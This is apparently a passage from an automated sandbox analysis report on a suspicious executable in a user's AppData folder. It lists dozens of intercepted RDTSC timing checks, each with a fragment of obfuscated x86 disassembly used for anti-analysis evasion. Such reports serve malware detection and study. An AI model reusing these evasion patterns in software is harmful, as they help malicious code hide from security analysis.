Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935F65 second address: 935FAC instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b add dword ptr [esp], 3C3CB321h 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007F5828CEC308h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c lea ebx, dword ptr [ebp+1244AB9Eh] 0x00000032 mov esi, dword ptr [ebp+122D2944h] 0x00000038 xchg eax, ebx 0x00000039 push ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c jno 00007F5828CEC306h 0x00000042 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 93602D second address: 93603E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 93603E second address: 936042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 936042 second address: 93608C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d pop edi 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F5828704A68h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a mov edi, 52B5CB0Fh 0x0000002f push 00000000h 0x00000031 mov di, 8D13h 0x00000035 call 00007F5828704A69h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 93608C second address: 936090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 936090 second address: 936096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 936096 second address: 936103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F5828CEC306h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push ebx 0x00000010 jp 00007F5828CEC308h 0x00000016 pushad 0x00000017 popad 0x00000018 pop ebx 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d jns 00007F5828CEC31Ch 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 jmp 00007F5828CEC30Eh 0x0000002b jmp 00007F5828CEC319h 0x00000030 popad 0x00000031 mov dword ptr [esp+04h], eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 push ecx 0x00000039 pop ecx 0x0000003a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 936103 second address: 936107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 956FA1 second address: 956FA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 956FA7 second address: 956FB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5828704A66h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 956FB2 second address: 956FD1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5828CEC315h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 95531D second address: 95534D instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5828704A6Ch 0x00000008 push edx 0x00000009 jmp 00007F5828704A72h 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F5828704A68h 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955495 second address: 955499 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955499 second address: 9554C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Eh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jp 00007F5828704A66h 0x00000019 je 00007F5828704A66h 0x0000001f pop edi 0x00000020 push ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9554C5 second address: 9554D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Eh 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9558B4 second address: 9558B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955D11 second address: 955D15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955D15 second address: 955D2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5828704A6Dh 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955EA9 second address: 955EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 955EAD second address: 955EB9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007F5828704A66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 94BEED second address: 94BEF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 94BEF5 second address: 94BEFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 94BEFB second address: 94BEFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 94BEFF second address: 94BF26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Fh 0x00000007 jbe 00007F5828704A66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F5828704A66h 0x00000017 jnp 00007F5828704A66h 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 92096E second address: 920985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F5828CEC30Dh 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 920985 second address: 920989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 920989 second address: 920997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 920997 second address: 92099B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 92099B second address: 92099F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 92099F second address: 9209A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9209A5 second address: 9209AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9209AB second address: 9209AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9209AF second address: 9209B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9209B5 second address: 9209C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007F5828704A66h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9568BE second address: 9568C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9568C3 second address: 9568D6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5828704A6Eh 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9568D6 second address: 9568DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 95A0C6 second address: 95A0D8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007F5828704A68h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9275B2 second address: 9275B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 95C36F second address: 95C375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 962430 second address: 962436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 961965 second address: 96196C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96200B second address: 962024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 jmp 00007F5828CEC30Fh 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 963771 second address: 963775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96383F second address: 963855 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC312h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 963855 second address: 96388B instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5828704A68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007F5828704A77h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push esi 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5828704A6Ah 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96388B second address: 9638AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5828CEC312h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9638AA second address: 9638B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9638B1 second address: 963904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F5828CEC308h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 0000001Ch 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 add dword ptr [ebp+122D1F2Ch], ecx 0x00000028 sub si, F48Bh 0x0000002d call 00007F5828CEC309h 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F5828CEC311h 0x00000039 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 963A48 second address: 963A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 963EA4 second address: 963EAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96436E second address: 964372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964372 second address: 964376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9643F7 second address: 96440E instructions: 0x00000000 rdtsc 0x00000002 jg 00007F5828704A68h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007F5828704A66h 0x00000015 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96440E second address: 964425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC313h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964506 second address: 96451B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828704A70h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96467D second address: 964687 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964687 second address: 9646A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A75h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964981 second address: 964987 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964987 second address: 96498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96498B second address: 96499D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jo 00007F5828CEC310h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96499D second address: 9649CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007F5828704A68h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov edi, dword ptr [ebp+122D2B70h] 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9649CD second address: 9649DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5828CEC30Ah 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964EB6 second address: 964EBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964EBA second address: 964EC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 964EC6 second address: 964F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jnc 00007F5828704A78h 0x0000000b popad 0x0000000c nop 0x0000000d pushad 0x0000000e movzx esi, si 0x00000011 or eax, dword ptr [ebp+122D561Fh] 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c sbb esi, 08A5F7D0h 0x00000022 push eax 0x00000023 pushad 0x00000024 push edi 0x00000025 push esi 0x00000026 pop esi 0x00000027 pop edi 0x00000028 push edi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 966938 second address: 966957 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC318h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9660C6 second address: 9660CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9660CC second address: 9660D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9660D1 second address: 9660F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9673C1 second address: 9673CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96944F second address: 969455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 969455 second address: 9694BA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d movsx esi, ax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F5828CEC308h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F5828CEC308h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov si, di 0x0000004b ja 00007F5828CEC306h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9694BA second address: 9694C4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96914B second address: 96914F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 969DF5 second address: 969DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96914F second address: 96915E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96A041 second address: 96A046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 969DF9 second address: 969E07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 969E07 second address: 969E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96E710 second address: 96E722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnp 00007F5828CEC306h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96E90F second address: 96E934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5828704A71h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96E934 second address: 96E93B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 96E93B second address: 96E9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, 3ACC8044h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F5828704A68h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D3785h], eax 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b pushad 0x0000003c mov esi, dword ptr [ebp+122D1E23h] 0x00000042 cmc 0x00000043 popad 0x00000044 mov eax, dword ptr [ebp+122D0FD9h] 0x0000004a push 00000000h 0x0000004c push edi 